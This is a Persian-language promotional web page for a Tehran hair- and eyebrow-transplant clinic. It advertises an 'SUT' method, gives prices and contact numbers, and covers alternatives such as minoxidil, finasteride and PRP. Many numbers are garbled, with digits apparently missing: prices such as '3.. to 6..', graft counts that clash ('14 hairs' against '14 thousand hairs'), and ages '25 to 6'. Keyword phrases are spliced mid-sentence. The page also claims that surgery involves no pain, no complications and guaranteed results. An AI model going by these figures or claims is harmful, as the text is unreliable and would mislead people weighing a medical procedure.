هزینه کاشت ابرو با موی طبیعی

کاشت مو طبیعی یا همان پیوند مو ، روشی است که امروزه به عنوان یک عمل بدون ریسک و پر طرفدار شناخته شده است. وجود تعدُد کلینیک های کاشت مو و روش های متنوع ، انتخاب را برای متقاضیان کمی دشوار کرده است.

از طرف دیگر هزینه کاشت مو نیز یکی از فاکتورهای مهم تصمیم گیری محسوب می شود که لازم است پیش از انتخاب، آگاهی های لازم در مورد آن بدست آورده شود.

کاشت مو SUT فرآیندی است که پرطرفتار ترین روش در زمینه کاشت مو محسوب می شود چراکه در این تکنیک دیگر همانند روش های رایج و سنتی شاهده جراحی، بجا ماندن اسکار، درد، تورم و در نهایت تراکم کم را شاهد نمی باشیم.

در روش SUT هزینه کاشت مو بین  3.. تا 6.. تومان است که بر اساس وسعت ریزش مو و تعداد گرفت ها مورد نیاز و شرایط فرد متقاضی متغیر است.

کاشت مو با تکنیک SUT در یک جلسه انجام می شود که می توان تا 14 تار مو را در یک جلسه پیوند زد که این کلینیک در تعداد کاشت مو ، رکورد دار تراکم در خاورمیانه میباشد.هزینه کاشت ابرو با موی طبیعی

توجه: به طور کلی برای افرادی که بانک موی خوبی داشته باشند می توان تا 14 تار مو را پیوند زد.

کاشت مو به روش SUT روشی نوین در علم کاشت مو است که این تکنیک بروز شده روش های قبلی همانند روش FUE میباشد که دانش و دستگاه آن به صورت انحصاری و برای اولین بار توسط مرکز تخصصی موی رنسانس در سال ۱۳۹۴ وارد ایران گردید که تحولی عظیم در این حوزه محسوب می شود.

نداشتن جراحی، تراکم بسیار بالا نسبت به سایر روش ها، عدم وجود درد و خونریزی از جمله ویژگی های کاشت مو SUT است

1- کاشت مو SUT در کلینیک رنسانس توسط  تیم مجرب کادر پزشکی و درمانی کاشت مو و تحت نظر متخصص انجام میشود و دیگر همانند روش های رایج و سنتی که شاهد انجام ان توسط تکنسین های تجربی است نمیباشید.

2- تمامی لوازم و ابزارهای کاشت مو SUT بطور انحصاری در این مجموعه بطور تمام استریل و یکبار مصرف مورد استفاده قرار داده می شوند.

3- یکی از مهمترین مزایای کاشت مو SUT برداشت گرفت ها با دستگاه می باشد که این امر باعث میشود از تمامی ظرفیت بانک موی فرد بدون اسیب دهی به بانک موها انجام شود.

4- لازم بذکر است روش کاشت مو SUT هیچگونه ارتباطی با روش های سیفر و سایر روش ها ندارد و تقریبا تمامی معایب و عوارض روش های دیگر کاشت مو مانند FITوFUT وSAFER  که جراحی، درد و خونریزی و بسیاری از عوارض متعدد دیگر که شاهده انها بوده ایم در این روش شاهد نمی باشیم و  تمامی ان موارد بطوره کامل برطرف شده است.

5- طراحی و ایجاد خط رویش مطابق با طرح دلخواه فرد کاندید کاشت مو انجام میشود که در نهایت غیرقابل تشخیص و همانند با خط رویش و موهای طبیعی شخص می باشد .

کاشت مو در کلینیک رنسانس در اتاق های VIP و کاملا مجهز، با لوازم تمام استریل توسط تیم مجرب کاشت مو بدون جراحی، درد و تورم انجام می شود که بدون عوارض جانبی و دوران نقاهت می باشد.

شما عزیزان جهت کسب اطلاعات تکمیلی و نوبت دهی  و مشاوره حضوری رایگان می توانید با شماره های ثابت: 21228821 و 2188995 تماس حاصل کرده و یا از طریق فرم انتهای صفحه ثبت فرمایید همچنین جهت مشاوره آنلاین می توانید از طریق تلگرام و واتساپ با شماره 9122115442 در ارتباط باشید و جهت بررسی موهای خود عکس خود را از جلو ، بالا و اطراف موهای خود ارسال نمایید تا توضیحات برایتان ارسال شود.

«مشاوره رایگان مجازی»

1-انطباق انتظارات با واقعیت

قبل از کاشت مو حتما چند نفر را که قبلا کاشت مو انجام داده اند از نزدیک ببینید وبا دید باز درمورد آن تصمیم بگیرید. هدف از کاشت مو پرکردن و پوشاندن منطقه خالی از مو است نه پرپشتی خیلی زیاد که فقط با گذاشتن کلاه گیس حاصل می شود. در کاشت مو باید واقع بین بود. متاسفانه افرادی که در مراکز غیرمعتبر برایشان بزرگ نمایی شده و دروغ زیاد شنیده اند انتظارات غیر واقعی پیدا می کنند.

البته انتخاب کلینیک مو با تجربه و همچنین نوع روش کاشت مو تاثیر زیادی بر نتیجه نهایی و پر پشتی موها خواهد گذاشت.بطور مثال در تکنیک SUT تراکم های بسیار بالا در صورت مناسب بودن بانک مو قابل دستیابی است و از این نظر رضایت تمامی مراجعه کنندگان پیشین کاملا جلب شده است.

2- تحقیق در مورد مراکز کاشت مو

مراکز کاشت مو بسیار زیادی در شهر تهران و دیگر شهرهای کشورمان تاسیس و در حال فعالیت هستند اما واقعیت این است که کاشت مو یک روش کاملا علمی است که علاوه بر تخصص ، نیاز به تجربه بسیار زیادی دارد.

مرکز تخصصی موی رنسانس عضو انجمن بین المللی پیوند مو با بیش از پانزده سال سابقه با بهره گیری از بهترین و مجرب ترین و باتجربه ترین تیم های کاشت مو در ایران  توسط تکنیک های جدید و انحصاری SUT و FUE  توانسته تحولی در امر کاشت مو را پایه گذاری نماید. این نکته بسیار حائز اهمیت است که به مرکزی مراجعه کنید که سابقه طولانی در انجام کاشت مو داشته باشد و کلیه مراحل کاشت مو را منطبق بر دانش روز پزشکی انجام دهد.

3- مکالمه حضوری با پزشک کاشت مو

در جلسه مشاور نمونه کارهای کاشت مو را ببینید و به توضیحات مشاور خود در مورد روش کاشت مو و نتیجه مورد نظردقت کنید. نگرانی و دلشوره درباره کاری که قرار است چهره تان را متحول کند کاملا برای مشاورین قابل درک است بنابراین سعی کنید موارد نگران کننده را به صراحت با مشاور خود درمیان بگذارید و به توضیحات و راهکارهای مشاور خود اطمینان نمایید.

4- نتیجه کاشت مو

نتیجه کاشت مو در افراد مختلف یکسان نیست . نتیجه کاشت موی شما می تواند یا کمتر از دوستان تان باشد. نکته کلیدی میزان بانک موی شماست. مثلا معمولا در روش ای رایج و سنتی FUT و FIT که با جراحی انجام می شود در افرادی که انعطاف پذیری پوست پشت سرشان خیلی زیاد است می توان نواری به عرض 1.5 سانتی متر برداشت درحالی که اگر پوست سرسفت باشد عرض نوار حداکثر 1 سانتی متر خواهد بود و به همین نسبت تعداد تارهای موی کاشته شده کمتر می شود.

توجه داشته باشید که در وسعت ریزش های وسیع با کاشت مو نمی توان تراکم موی سنین نوجوانی را دوباره ایجاد کرد. معمولا در طاسی های وسیع پرپشتی موها پس از کاشت مو 6 تا 8 درصد موهای طبیعی است که البته اگر کلینیک کاشت مو به درستی انتخاب گردد همین میزان از تراکم نیز در نهایت بسیار رضایت بخش خواهد. زیرا طراحی خط رویش و روش کاشت موی مورد استفاده تاثیر زیادی بر ظاهر طبیعی و پرپشت تر بود موها دارد.

5- تاثیر سن در کاشت مو

کاشت مو محدودیت سنی خاصی نداشته و در سن بالا و با موهای سفید نیز قابل انجام است. افراد 25تا6 ساله بهترین کاندید کاشت مو هستند البته افراد مسن سالم هم کاندید مناسبی برای کاشت مو محسوب می شوند زیرا موهای سفید کاشته شده بسیار طبیعی دیده شده و کسی متوجه کاشت موی افراد مسن نمی شود. ضمنا این گروه می توانند موهای کاشته شده را نیز مانند موهای طبیعی رنگ کنند.

6- کاشت مو برای خانمها

لازم است بدانید که کاشت مو مختص آقایان نیست و برای خانم ها نیز انجام می شود مثلا خانم هایی که موهای خود را سفت می بندند دچار طاسی سر می شوند یا خانم هایی که پیشانی خیلی بلندی دارند می توانند با کاشت مو این مشکل را برطرف کنند

7- تعداد گرافت های قابل کاشت

از نظر علمی در یک جلسه کاشت مو با روش ترکیبی در بهترین شرایط حداکثر 4 گرفت یا 12 تار مو کاشته می شود. علت این محدودیت میزان انعطاف پذیری پوست ناحیه اهدا کننده در پشت سر و تراکم موهای آن منطقهای است. شایان ذکر است که مرکز تخصصی موی رنسانس رکورد دار کاشت مو تا 5 گرفت (14 تار مو ) در یک جلسه می باشد که البته برای کسانی قابل انجام است که از بانک موی خوبی برخوردارهستند

بنابراین ادعای کاشت ارقام نجومی مانند 16 یا جنبه علمی و واقعی نداشته وصرفا تبلیغات گمراه کننده بوده و غیر اخلاقی است.

8- انتخاب روش کاشت مو

روش های مختلفی برای کاشت مو و پیوند موی طبیعی وجود دارد ، روش FIT یک متد غیر جراحی است که تعداد موهای کمتری را می توان از طریق آن کاشت. در این روش گرافت های مو به صورت تک به تک از منطقه بانک مو توسط هولدر دستی جدا و در منطقه طاس سر کاشته می شود. میزان موفقیت پیوند هم کمتر از روش جراحی است و معمولا توصیه می شود که از روش ترکیبی جراحی یا FUT و روش غیر جراحی FIT به صورت همزمان استفاده گردد که عوارض ذکر شده در بالا را شاهد هستیم.

انجام دادن روش غیر جراحی  FITکه  با هولدر دستی برداشت می شود ،  و یا استفاده از روشی ب  (SAFER)  تاثیری در کیفیت عمل ندارد. در همه این حالت ها از پانچ های متداول و رایج استفاده می شود  . روش SAFERکه در رسانه ها تبلیغ می شود چیز اضافه ای نسبت به روش های رایج ندارد و عوارض متعددی را دارد ،

البته در حال حاضر همانطور که ذکر شد کاشت مو به روش SUT جدیدترین و بهترین متد پیوند مو طبیعی محسوب می شود که به صورت انحصاری و برای اولین بار توسط کلینیک کاشت مو رنسانس وارد ایران گردیده است که در این روش تقریبا تمامی معایب و عوارض روش های دیگر کاشت مو برطرف شده است و میتوانیم تا 5 گرفت یعنی تا 14 تار مو را در صورت داشتن بانک موی مناسب پیوند زنیم.هزینه کاشت ابرو با موی طبیعی

9- خط رویش مو

برای اینکه نمای جلوی سر بعد از کاشت مو غیرطبیعی نشود وچهره فرد اخم آلود به نظر نرسد لازم است خط موی جلوی سر از میزان مشخصی پایین تر آورده نشود.لازم است بیماران در این مورد از تجربه پزشک استفاده کنند وهمفکری کنند و بی دلیل اصرار به پایین آوردن زیاده از حد خط رویش مو نداشته باشند البته در اخر نظر شخص کاندید اعمال خواهد شد با صلاح دید پزشک.

طراحی خط رویش مو موضوعی است که در نتیجه نهایی کاشت مو بسیار موثر است و برای طبیعی بودن خط رویش نیاز به تجربه و دانش علمی زیادی است ، بنابراین در این مورد حتما با پزشک خود مشورت نمایید.

1- نتیجه نهایی کاشت مو

کاشت مو فرایندی نیست که بلافاصله نتیجه آن قابل مشاهده باشد ، برای مشاهده نتایج نهایی کاشت حدود 1 تا 12 ماه زمان لازم است تا موهای پیوند داده به مرحله رشد کامل خود رسیده و پیوند مو تثبیت گردد.

به غیر از کاشت مو روش های دیگری برای جلوگیری از ریزش مو و درمان آن وجود دارد که البته در حال حاضر این روش ها نمی تواند از نظر ماندگاری و کیفیت جای پیوند موی طبیعی را بگیرد:

1- روش درمان های دارویی :

داروهایی مانند ماینوکسیدیل و قرص فیناستراید از جمله داروهایی هستند که تاثیر آنها بر کاهش ریزش مو و همچنین رویش مجدد توسط FDA  (سازمان دارویی ایالات متحده) تایید شده اما این روش ها نیز داری عوارض مخصوص به خود هستند :

·         نیاز به استفاده همیشگی از محلول ماینوکسیدیل و قرص فیاستراید

·         بازگشت ریزش مو به حالت قبل پس از قطع مصرف

·         وجود عوارض ناخواسته مانند افزایش موهای زائد بدن در دوره مصرف ماینوکسیدیل

·         وجود عوارض هورمونی در قرص فیانستراید که اخیرا مشخص شده ممکن است دائمی باشد

2- درمان ریزش مو با استفاده از پکیج ویژه ریزش مو:

برخی مواقع توصیه ما برای افرادی که ریزش موی ارثی دارند  این است که برای  جلوگیری از ریزش مو از پکیج PRPمزوتراپی،  لیزرتراپی و ویتامین درمانی استفاده کنند و جهت تزریق PRPو مزوتراپی حتماً به مراکز معتبر و مجاز مراجعه کنند. PRPعبارت است از تزریق خونی که از بیمار گرفته شده و سانتریفوژ شده است. در این روش پلاسمای تغلیظ شده را که پلاکت آن پنج برابر خون معمولی است جدا کرده و در پوست سر تزریق می کنند . ادعا می شود چون پلاسما تغلیظ شده است غنی ازفاکتورهای رشد بوده ومی تواند ریشه مو را تقویت کند. کاربرد PRP در درمان طاسی ایده ای نو محسوب می شود PRP در اروپا و آمریکا در مرحله تحقیقاتی است ولی نتایج تحقیقات ضد و نقیض است . در یک مطالعه در برزیل PRP پس از کاشت مو با بهبودی 15% در قطر و تعداد موها همراه بوده است. در ایران کسانی که این کار را انجام می دهند اسم آن را تزریق سلول بنیادی گذاشته اند و این اشتباه است . پلاکت اصلاً سلول بنیادی نیست . درواقع پلاکت چون هسته ندارد اصلاً سلول نیست

3- سلول های بنیادی :

تحقیقات بر روی سلول های بنیادی Stem cellsو سلول درمانی یا کشت مو همچنان ادامه دارد ولی هنوز به نتیجه عملی در انسان نرسیده است. این امید وجود دارد که در آینده با شناسایی ژن های مسول طاسی قبل ازسن بلوغ و حذف یا اصلاح آنها با ژن درمانی مشکل طاسی به طور کامل برطرف شود .در این صورت اصلا نیازی به کاشت مو نخواهد بود که البته سالها تا کامل شدن تحقیقات و بررسی نتایج زمان باقی مانده است.

یکی از مهم ترین مسائلی که پیش از اقدام به کاشت مو ذهن متقاضیان را به خود مشغول می کند هزینه های مربوط به پیوند موی طبیعی است. هزینه کاشت مو بستگی به عوامل مختلفی دارد از جمله تعداد گرفت های مورد نیاز کاشت مو ، تعداد جلسات و..

اما به صورت کلی هزینه یا قیمت کاشت مو به روش SUT در کلینیک تخصصی موی رنسانس بین 3.. تا 6.. تومان می باشد.

لازم است در نظر داشته باشید این هزینه نسبت به تراکم و کیفیت بالاتر و همچنین ماندگاری مادام العمر به نسبت نتایج کاشت مو با روش های رایج و سنتی بسیار به صرفه تر بوده و دیگر نیازی به دارو و درمان های طولانی و بی اثر نمیباشید و با توجه به سابقه طولانی کلینیک رنسانس کاملا رضایت شما را در پی خواهد داشت.

شما عزیزان میتوانید جهت کسب اطلاعات و نوبت دهی با شماره های 21228821 و 2188995 تماس حاصل کرده و یا عکس خود را از طریق تلگرام و واتساپ به شماره 9122115442 ارسال فرمایید.

همچنین جهت ویزیت مجازی و ارسال عکس آنلاین میتوانید از طریق لینک زیر اقدام کرده تا مشاورین ما با شما تماس بگیرند.

مشاوره رایگان مجازی

این مرکز افتخار دارد هم اینک با این تکنیکهای جدید و انحصاری در ایران کاشت و ترمیم مو را به سطح خود رسانده , که دیگر نیازی به روشهای FUT-FIT که برش و بخیه و یا بیهوشی در آنها شاهد بودیم نمیباشد

کاربری یا نشانی

رمز

مرا به خاطر بسپار

چرا کاشت ابرو ؟ به طور کلی شاید مهم‌ترین جزء در چهره شما، ابروهایتان باشد. زیرا ابروها نه تنها برای برقراری ارتباط و بیان احساسات از طریق صورت اهمیت دارند، بلکه کارکردها و وظایف مهمی از قبیل دور نگه داشتن گرد و غبار، آلودگی‌ها و عرق از چشمان شما نیز بر عهده ابروها می‌باشد. علاوه بر آن ابروها یک چهارچوب یا قاب زیبا برای چشم‌ها ایجاد می‌کنند و جذابیت چشم‌ها را افزایش می‌دهند. امروزه اصلاح ابروها جهت دستیابی به شکل، طول و تراکم دلخواه برای آن، به یک عمل زیبایی کاملاً رایج تبدیل شده است. در این میان، کاشت ابرو با موی طبیعی به عنوان مؤثرترین راهکار و تنها راه حل دائمی برای ترمیم و اصلاح شکل ابرو شناخته می‌شود.هزینه کاشت ابرو با موی طبیعی

عمل کاشت ابرو را هم به روش FUT و هم به روش FUE که با FIT نیز شناخته می‌شود، انجام می‌دهد. کاندیداهای مناسب برای عمل کاشت ابرو افرادی هستند که یک یا هر دو ابروی خود را به صورت جزئی یا کامل از دست داده‌اند. متخصیصین این رشته با بهره‌گیری از مهارت‌های هنرمندانه و تجربه بالای خود در ز مینه عمل کاشت مو این تضمین را به شما می‌دهند که تک تک گرافت‌های مو دقیقاً در زاویه و جهت رشد طبیعی موهای ابرو قرار می‌گیرد تا شکل کاملاً طبیعی و زیبای ابروهای شما بازسازی شود.

ریزش ابرو می‌تواند به خاطر یک یا چند عامل مختلف باشد. شایع‌ترین علل ریزش ابروها عبارت است از:

ابتلا به برخی بیماری‌ها و مصرف بعضی از داروها می‌تواند باعث کم‌پشت شدن شدید ابروها و یا حتی از بین رفتن آن به طور کامل شود. آسیب‌های فیزیکی، سوختگی و مصدومیت‌ از ناحیه صورت نیز می‌تواند باعث ریزش جزئی یا کامل ابروها شود. در صورت بعضی از افراد اصلاً هیچ ابرویی وجود ندارد، زیرا در گذشته عمل جراحی حذف موهای زائد با لیزر را انجام داده‌اند و حالا می‌خواهند دوباره ابروهای خود را بازسازی کنند. تمامی این افراد می‌توانند با انجام عمل کاشت مو ابرو، ابروهای طبیعی و زیبای خود را دوباره به دست بیاورند.

مهم‌ترین عامل در موفقیت یک عمل کاشت ابرو با تقبل قیمت کاشت ابرو طبیعی ، انتخاب روش مناسب برای این عمل و کیفیت نحوه انجام آن است. با استفاده از روش FUE، نتایج بسیار خوب و رضایت‌بخشی برای بیمار به دست می‌آید. اما بر خلاف روش‌های نوینی که ما از آن بهره می‌گیریم، روش‌های قدیمی و منسوخ شده‌ای که هنوز هم در اغلب مراکز کاشت مورد استفاده قرار می‌گیرند نتایجی با شکل طبیعی برای ابرو حاصل نمی‌کند و علاوه بر آن جراحت‌های زیادی در زمان عمل و نیز جای زخم‌های ناخوشایندی بعد از عمل، در محل برداشت فولیکول‌های مو باقی می‌گذارد. در حالی که در روش FUE هیچ نیازی به استفاده از تیغ جراحی و بخیه زدن وجود ندارد و نتایج آن به شکل ابروهایی لطیف و طبیعی بلافاصله بعد از عمل، مشخص خواهد بود. مزیت مهم دیگر برای این روش، عدم احساس درد و ناراحتی توسط بیمار بعد از عمل جراحی است، زیرا زخم‌های بسیار ریزی که در زمان این عمل در صورت بیمار ایجاد می‌شود به قدری کوچک است که ظرف مدت کوتاهی بسته می‌شود و کاملاً بهبود پیدا می‌کند.ضمناً این روش کاشت مو برای کاشت و یا افزایش تراکم ریش و سبیل و موی سینه در آقایان هم مورد استفاده قرار می گیرد.

اگر ریزش ابروها به علت ابتلا به یک بیماری خاص باشد، لازم است ابتدا آن بیماری یا عامل زمینه‌ای که باعث ریزش مو می‌شود درمان شود تا بتوان نتایج خوبی از عمل کاشت ابرو با موی طبیعی به دست آورد. همچنین افرادی که ابروهای خود را به دلیل آسیب‌دیدگی یا مصدومیت از ناحیه صورت از دست داده‌اند باید صبر کنند تا آسیب‌دیدگی آنها به طور کامل بهبود پیدا کند. بیماران سرطانی که ابروهایشان به علت استفاده از روش‌های پرتو درمانی یا شیمی درمانی کم‌پشت شده یا به طور کامل ریخته است نیز برای انجام عمل کاشت ابرو باید منتظر بمانند تا دوره درمان آنها به پایان برسد.

عمل کاشت ابرو با موی طبیعی در حدود ۲ ساعت زمان می‌برد و بعد از پایان آن هم باید مدتی در حدود یک ساعت را در مطب بمانید و تحت نظر باشید. ممکن است بعد از پایان کار شما احساس خستگی کنید، بنابراین بهتر است آن روز را به طور کامل از محل کار یا تحصیل خود مرخصی بگیرید

توصیه‌ها و دستوراتی که  پزشکان برای زمان قبل از عمل کاشت ابرو با موی طبیعی به شما می‌دهد، از جمله نحوه استفاده از قطره‌های چشمی، کرم‌های مرطوب کننده و محصولات زیبایی و بهداشتی را به دقت رعایت کنید. در روز عمل جراحی باید صورت خود را به طور کامل بشویید، تمیز کنید و اصلاً آرایش نکنید. همچنین دقت کنید که قبل و بعد از عمل کاشت ابرو به هیچ وجه نباید از لنزهای چشمی تماسی استفاده کنید.

عمل کاشت ابرو با موی طبیعی در اغلب موارد فقط با استفاده از بی‌حسی موضعی انجام می‌شود. یعنی هم ناحیه اهدا کننده که فولیکول‌های مو از آن برداشت می‌شود و هم ناحیه ابروها که گرافت‌های مو در آن کاشته می‌شود، با استفاده از بی‌حسی موضعی بی‌حس می‌شوند. عمل کاشت ابرو از نظر روش اجرا، همانند سایر عمل‌های کاشت مو می باشد، یعنی فولیکول مو از یک ناحیه اهدا کننده برداشته می‌شود و با دقت در ناحیه پذیرنده که همان محل ابروهای طبیعی شماست، کاشته می‌شود. با این حال، عمل کاشت ابرو عمل بسیار ظریف و حساسی است و برای انجام آن به دقت و مهارت خیلی زیادی نیاز است. زیرا تک تک تار موهای ابرو باید دقیقاً با زاویه و جهت خاصی قرار بگیرند تا بعداً ابروها شکل کاملاً طبیعی و زیبایی پیدا کند. انتخاب روش مناسب برای این عمل نیز اهمیت زیادی در موفقیت آن دارد. در واقع روش مناسب برای هر فرد به مقداری از ابرو که از قبل باقی مانده است و نیز به علت ریزش ابروهای او بستگی دارد و ممکن است کاملاً متفاوت با افراد دیگر باشد.

بسته به روشی که برای عمل کاشت ابروی شما استفاده شده است، ممکن است لازم باشد که ظرف یک تا دو هفته بعد از عمل، برای کشیدن بخیه‌ها یک بار دیگر به پزشک جراح خود مراجعه کنید. توصیه‌ها و دستور مراقبت‌های لازم برای دوره بعد از عمل کاشت ابرو، در زمان ترخیص شما از کلینیک در اختیارتان قرار داده خواهد شد. بهبودی بعد از عمل

در طی چند هفته بعد از عمل کاشت ابرو، شما به تدریج شاهد پرپشت شدن و شکل گرفتن ابروهای دلخواه خود خواهید بود. بعد از گذشت مدت کوتاهی از عمل، دیگر هیچ کس نمی‌تواند تشخیص بدهد که ابروی شما قبلاً کم‌پشت بوده یا اصلاً ابرو نداشته‌اید.

بلافاصله بعد از آنکه فولیکول‌های مو با موفقیت در محل ابرو کاشته شدند، همه آنها شروع به رشد می‌کنند. فولیکول‌های کاشته شده با سرعت خیلی بالایی رشد می‌کنند و بعد از مدت کوتاهی یک ابروی متراکم و پرپشت را تشکیل می‌دهند. بنابراین می‌توان تضمین کرد که نتایج عمل کاشت ابرو با موی طبیعی  بعد از مدت کوتاهی از انجام این عمل، قابل مشاهده و کاملاً رضایت‌بخش خواهد بود.

هزینه دقیق عمل کاشت ابرو با موی طبیعی ، پس از انجام بررسی‌های لازم در جلسه مشاوره اولیه به اطلاع شما خواهد رسید.

رشد موهای جدید در ناحیه ابرو را می‌توانید بعد از چند ماه ببینید، اما روند بهبود نتایج این عمل تا یک سال بعد از کاشت ابروها همچنان ادامه پیدا خواهد کرد.

زمان بهبودی بعد از این عمل، خیلی کوتاه است. البته تا هفت روز بعد از عمل کاشت ابرو نباید هیچ گونه فعالیت فیزیکی شدید انجام بدهید، اما اغلب افرادی که این عمل را انجام می‌دهند، بسته به ماهیت فعالیت شغلی خود می‌توانند بعد از ۲۴ ساعت به محل کار خود بازگردند.

بله، تعداد کمی از فولیکول‌های مو از داخل پوست سر شما برداشته می‌شود و در ناحیه‌ای از ابرو که آسیب دیده یا موی آن ریخته است، کاشته می‌شود. موقعیت جدید هر تار مو در ناحیه ابرو با دقت و ظرافت خاصی تعیین می‌شود و گرافت مو با جهت و زاویه‌ای مطابق با موی طبیعی ابروی شما قرار می‌گیرد تا دقیقاً شکل ابروهای طبیعی خود شما را پیدا کند.

مدت زمان عمل کاشت ابرو به مقدار کاری که باید انجام شود و نیز به دقتی که بیمار در رعایت دستورات و مراقبت‌های قبل از عمل به خرج داده است، بستگی خواهد داشت. معمولاً ما از بیماران می‌خواهیم یک روز کامل را برای عمل کاشت مو یا ابرو وقت بگذارند.

بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دیدگاه

وب سایت لست کلینیک با هدف ارائه مطالب پزشکی و سلامت و همچنین ارائه خدمات کلینیک زیبایی تاسیس شده است . تمامی مطالب این وب سایت با سند و مدرک می باشند و لست کلینیکی ها هیچ مقاله ای را بدون منبع منتشر نخواهند کرد .

تمام حقوق این وب سایت متعلق به لست کلینیک می باشد .

در روش کاشت مو(SUT) دیگر نیازی به تیغ جراحی، بیهوشی، به جا ماندن اسکار، برش نبوده و هیچ گونه عوارضی نداشته ؛ مامی توانیم، به وسیله، دستگاههای تمام اتوماتیک زیر نظر متخصصین مجرب، برداشت و پیوند مو را تا 14 هزار تار موی واقعی، که 3 برابر نسبت به روشهای قدیمی کاشت مو می باشد را انجام دهیم

کاشت ابرو با تكنيك جديد FUE روش در یک جلسه ، كاملاً بدون درد ، عوارض و بدون كوتاهي موهاي شخص در قسمت برداشت انجام ميشود و از مهمترین تفاوت هاي آن با روش های دیگر استفاده از تيم مجرب و انجام ان با خواب طبيعي ابرو ميباشد كه ديگر همانند روش هاي رايج و قديمي بصورت سيخ سيخ و نظم نخواهد بود

ترمیم مو به روش HRT تنها روش استاندارد ترمیم مو می باشد که تا به امروز معرفی شده است در این روش دیگر نیازی به بانک موی فرد نیست و مناسب ترین و بهترین روش برای افرادی است که بانک موی مناسبی ندارند و یا دارای بیماری خاصی می باشند موهای آن 1% طبیعی بوده و در یک جلسه انجام می شود

روش های مختلفی برای کاشت مو وجود که پس از بررسی شرایط متقاضی کاشت مانند سن،میزان موهای ریخته شده و .. بهترین روش برای کاشت مو برای وی پیشنهاد می گردد.

یكی از افتخارات این مرکر انجام ترمیم موی بیش از 4 نفر اقایان وبانوان بوده که با رضایت كامل این عزیزان همراه بوده است .هزینه کاشت ابرو با موی طبیعی

کاشت ریش در این مرکز با استفاده از مدرترین ابزار و تجهیزات انجام می شود و تراکم ریش های کاشته کاملا طبیعی است.

کاشت ابرو در مرکز موی رنسانس با جدیدترین متدهای روز دنیا و در یک جلسه بدون احساس درد و ناراحتی انجام می شود.

“خداوند متعال مو را برای زیبایی بندگانش قرار داده است”

مرکز فوق تخصصی کاشت مو و ترمیم موی رنسانس در سال 1379 تآسیس گردید و طی این مدت بیش از 15 مورد کاشت مو و ترمیم مو توسط این مرکز انجام شده است. این موفقیت مرهون پویایی در جهت برخورداری از روشهای نوین و ارائه آخرین متدهای کاشت مو كه با بنیان گذاری تكنیك های کاشت موی SUTو FUT و ترمیم (HRT)كه بطور انحصاری در ایران میباشد.

جلب رضایت مراجعین مهمترین هدف دستاورد صاحبان این مرکز است.ما افتخارداریم بگویم که اکثر مراجعین جدید ما از طرف مراجعین قبلی ما به ما معرفی میشوند که این امر نشان دهنده وجود رضایت و اعتماد مراجعین قبلی به خدمات کاشت مو و ترمیم موی انجام شده در این مرکز است.

تصمیم به کاشت مو، یک تصمیم مهم و کلیدی است. پیش از کاشت یا ترمیم مو، لازم است که فرد خود را آماده کند چرا که عمل کاشت مو و یا عمل های مشابه در این زمینه بسیار حساس هستند.

رادیو فرکوئنسی (radio frequency) یا به اختصار RF یکی از تکنیک هایی است که از ورود آن به دنیای پزشکی و زیبایی پوست و مو مدت زیادی نگذشته است اما روز به روز استفاده از آن جهت جوانسازی پوست و حتی تقویت مو در جهان گسترش پیدا کرده و امروزه استفاده از آراف (RF) در بسیاری از کلینیک های پوست و مو رواج دارد.

کاشت مو افراد مشهور شاید یکی از جالب ترین و پرطرفدارترین نکاتی باشد که بسیاری از افراد به ویژه آنهایی که می خواهند درباره تکنیک های کاشت مو و مزایای آن بدانند، در این مورد نیز گاه جستجو و تحقیق می کنند.

جالب است بدانید گاهی اوقات موهای ما گرسنه اند و محتاج غذای مناسبند. پس چه خوب است که بجای جستجوی شامپوهای حاوی مواد مغذی، مواد مغذی لازم را در رژیم غذایی مان بگنجانیم. عواملی مانند ژنتیک؛ سن و هورمونها بر سلامت موی ما تاثیر گذار است اما آنچه که ما میخوریم مهمترین عامل در حفظ و کنترل سلامت موهایمان محسوب می شود و خوردن مواد مغذی غنی و لازم برای مو، می تواند باعث ضخیم شدن موها، رشد طبیعی آنها و درخشندگی آنها شود.

در روش جدید کاشت مو(SUT) دیگر نیازی به تیغ جراحی، بیهوشی، به جا ماندن اسکارو برش نبوده و هیچ گونه عوارضی در آن وجود ندارد، ما می توانیم، به وسیله دستگاههای تمام اتوماتیک زیر نظر متخصصین مجرب، برداشت و پیوند مو را تا 14 هزار تار موی واقعی، که 3 برابر از روشهای قدیمی کاشت مو می باشد را انجام دهیم . همانطور که در عکس های قسمت گالری ملاحظه می کنید. در این تکنیک جدید شما شاهد خط رویش بسیار طبیعی و تراکم بسیار بالا هستید، تا جایی که هیچ کس قادر به تشخیص کاشت زنده و پیوند موی طبیعی شما نیست.

دیگر مانند روش های سنتی و قدیمی کاشت مو FIT و FUT نیازی به جلسات مكرر و زمان طولانی برداشت و كاشت مو و خستگی بیمار نمی باشیم. از جمله مزایای این تكنیك کاشت مو ، بدون جراحی، خونریزی و درد، آن است شاهد هیچ گونه اسكاری چه در قسمت برداشت و چه در قسمت موهای كاشته شده نمی باشیم، در این متد جدید کاشت مو می توانیم، تراكمی سه برابری نسبت به روش های FIT و FUT را انجام دهیم. كه کاشت14تار مو را در یك جلسه با استفاده از این روش شاهد هستیم، همچنین لازم بذكر است این تكنیك کاشت مو به روز ترین متد روز امریكا واروپا است. از مزایای این تكنیك کاشت مو، طبیعی بودن خط رویش، مهندسی آن توسط تیم مجرب كاشت مو ، تراكم بالای مو در این روش، انجام آن در یك جلسه ومشاهده كردن موهای كاشته شده بعد از كاشت موی طبیعی كه به اندازه یك سانتیمتر است.

در این بخش نظراتی که مراجعین قبلی در پیج اینستاگرام مرکز تخصصی موی رنسانس به اشتراک گذاشته اند را جمع آوری کرده ایم.

شما عزیزان جهت اطلاعات و ارتباط با مراجعین محترم قبلی میتوانید به پیج اینستاگرام مراجعه کرده و در پست “نظرات مراجعین قبلی” مراجعه کنید.

ابروی شما می تواند مهمترین عنصر صورت شما باشد و نه تنها برای برقراری ارتباطات نقشی حیاتی دارد بلکه کابردهای عملی در نازیبای نشان دادن چشمان شما نیز دارد. ابروها معمولا چشم ها را قاب بندی می کنند و به چهره جلوه می دهند.

بهترین فصل سال برای کاشت مو چی زمانی است ؟ آیا انجام کاشت مو در فصل های مختلف تاثیری در روند کاشت مو دارد ؟ اگر بخواهیم به شکل خلاصه کاشت مو را تعریف کنیم باید بگوییم که کاشت مو عبارت است از برداشت گرفت های مورد نیاز از فضای پشت سر فرد( که اصطلاحا به آن بانک م

تعریف موخوره: هنگامی که نوک مو دو و یا چند شاخه می شود به آن موخوره می گویند و دیگر آن تریکوپتیلوز می باشد. از دلایل این پدیده می توان به استفاده از شامپو های نا مناسب ، کوتاه نکردن مو در مدت زمان طولانی و خشکی زیاد مو اشاره کرد.

